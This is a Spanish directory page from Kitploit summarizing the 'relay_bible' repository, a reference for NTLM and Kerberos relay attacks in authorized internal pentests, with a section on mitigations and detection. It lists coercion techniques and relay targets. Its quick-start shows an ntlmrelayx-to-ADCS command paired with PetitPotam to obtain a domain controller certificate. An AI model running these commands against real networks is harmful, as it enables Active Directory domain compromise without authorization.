Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
relay_bible — Referencia técnica a múltiples técnicas de relay | Kitploit
Herramientas/GitHubGitHub/rootsecdev/relay_bible
Escalada de PrivilegiosReconocimientoAnálisis de VulnerabilidadesExplotaciónSeguridad de RedesPruebas de PenetraciónAutenticaciónAprendizaje y EducaciónRed TeamingRecursos CuradosLabs y Práctica
19322hace 3 mesesRevisado por Kitploit

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
rootsecdev/relay_bible

relay_bible

Referencia técnica a múltiples técnicas de relay

Ver Repositorio

Biblia del relay — Guía de relay para pruebas de penetración internas

Una referencia exhaustiva para ataques de relay NTLM durante pruebas de penetración internas autorizadas. Cubre fundamentos de autenticación, técnicas de coerción, objetivos de relay por protocolo, herramientas, encadenamiento avanzado y mitigaciones defensivas.

Requisitos previos

  • Un host de ataque Linux (Kali, Parrot o similar)
  • Python 3.10+ con Impacket instalado
  • Acceso de red al entorno objetivo (engagement autorizado)
  • Conocimientos básicos de Active Directory y redes de Windows

Tabla de contenidos

1. Fundamentos

  • Teoría de autenticación y relay NTLM — Cómo funciona NTLM, por qué el relay es posible, NTLMv1 vs v2, firmado, EPA
  • Teoría de autenticación y relay Kerberos — Intercambio AS/TGS/AP, canonicalización de SPN, por qué Kerberos sigue siendo susceptible al relay
  • Identificación de oportunidades de relay — Enumeración, búsqueda de hosts sin firmado, mapeo de la superficie de ataque

2. Técnicas de coerción

  • Descripción general de la coerción — Forzar a las máquinas a autenticarse contra tu listener
  • PetitPotam (MS-EFSRPC)
  • PrinterBug / SpoolSample (MS-RPRN)
  • DFSCoerce (MS-DFSNM)
  • ShadowCoerce (MS-FSRVP)

3. Objetivos de relay (por protocolo)

  • Relay SMB — Relay hacia SMB para ejecución de código
  • Relay LDAP / LDAPS — Delegar acceso, crear cuentas de máquina, RBCD
  • Relay MSSQL — Relay hacia SQL Server para ejecución de comandos
  • Relay HTTP / WebDAV — Relay hacia endpoints web, coerción WebDAV
  • Ataques ADCS (ESC1–ESC15) — Todas las técnicas de escalada ADCS, incluido el relay
  • Relay SMTP / IMAP — Relay hacia Exchange/servicios de correo
  • Relay RPC / DCOM — Relay hacia endpoints RPC
  • Relay mediante proxy SOCKS — Mantener sesiones de relay persistentes mediante SOCKS

4. Configuración y uso de herramientas

  • Responder — Envenenamiento y captura de hashes
  • ntlmrelayx.py — El framework de relay principal
  • mitm6 — Toma de control de DNS IPv6 para coerción
  • Certipy — Enumeración y relay de ADCS
  • Coercer — Herramienta de coerción automatizada
  • krbrelayx — Relay Kerberos y abuso de delegación

5. Técnicas avanzadas

  • Relay entre protocolos — Relay de un protocolo a otro
  • Cadenas de ataque IPv6 — Combinaciones de mitm6 + relay
  • Encadenamiento de relay y pivoting — Escenarios de relay multisalto
  • Truco de coerción WebDAV — Forzar autenticación HTTP desde las máquinas
  • Relay Kerberos mediante abuso de CNAME DNS — Cymulate / CVE-2026-20929, relay de TGS Kerberos mediante envenenamiento de CNAME

6. Defensa y detección

  • Mitigaciones — Firmado SMB, firmado LDAP, EPA, deshabilitar NTLM
  • Detección — Fuentes de registro, reglas Sigma, indicadores de comportamiento

Referencia rápida: Relay NTLM — ¿Qué se puede relayar a dónde?

Se aplica al relay NTLM clásico en entornos modernos parcheados (posteriores a CVE-2019-1040). Para el desglose más detallado entre protocolos, consulta Relay entre protocolos.

* El objetivo no debe requerir firmado SMB † El NTLM originado desde SMB incluye flags de firmado en NEGOTIATE, que LDAP y ADCS HTTP exigen — lo que hace que la sesión relayada requiera una clave de firmado que el atacante no posee. Por eso se prefiere la autenticación originada desde WebDAV/HTTP para el relay hacia LDAP y ADCS.

Referencia rápida: Relay Kerberos mediante abuso de CNAME DNS

La primitiva de Cymulate / CVE-2026-20929 (ene 2026) — el atacante envenena el DNS con un CNAME, Windows canonicaliza el SPN, el cliente solicita un TGS para el objetivo elegido por el atacante y el AP-REQ se relaya. Debido a que muchos servicios aceptan tickets basándose únicamente en la parte DNS del SPN, la clase del SPN de origen importa mucho menos que en el relay NTLM — lo que condiciona el ataque es si el servicio objetivo aplica su propio control anti-relay.

Todas las filas asumen que el atacante tiene posición de red para envenenar el DNS (DHCPv6 mediante mitm6, ARP, DHCPv4 rogue). Técnica completa: Relay Kerberos mediante abuso de CNAME DNS.

Inicio rápido

  1. Enumera — Encuentra hosts con el firmado deshabilitado e identifica objetivos de coerción
  2. Posiciónate — Inicia tu listener de relay (ntlmrelayx) apuntando a tu objetivo
  3. Coacciona — Provoca la autenticación desde una máquina de origen hacia tu listener
  4. Profit — El relay captura y reenvía la autenticación a tu protocolo objetivo
root@kitploit:~
# Classic example: coerce DC, relay to ADCS for a DC certificate
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController
python3 PetitPotam.py ATTACKER_IP DC_IP
Descargar herramienta
Autenticación de origen→ SMB→ LDAP→ MSSQL→ HTTP→ ADCS→ SOCKS
SMB✅*❌†✅✅❌†✅
HTTP✅*✅✅✅✅✅
WebDAV✅*✅✅✅✅✅
MSSQL✅*✅✅✅✅✅
Servicio objetivoRelayable salvo que...Parche / estado
SMBel firmado SMB sea obligatorio en el objetivo—
LDAPel firmado LDAP sea obligatorio—
LDAPSLdapEnforceChannelBinding = 2 (Always)—
HTTP / IISCBT HTTP exigido (verificación de token HTTP.sys = Require)CVE-2026-20929 retroporta el CBT de HTTP.sys
ADCS /certsrv/Extended Protection = Require en el vdirAplica el CBT de HTTP.sys mediante CVE-2026-20929
MSSQLExtended Protection habilitado—
Exchange (OWA/ECP/…)EPA en todos los directorios virtuales—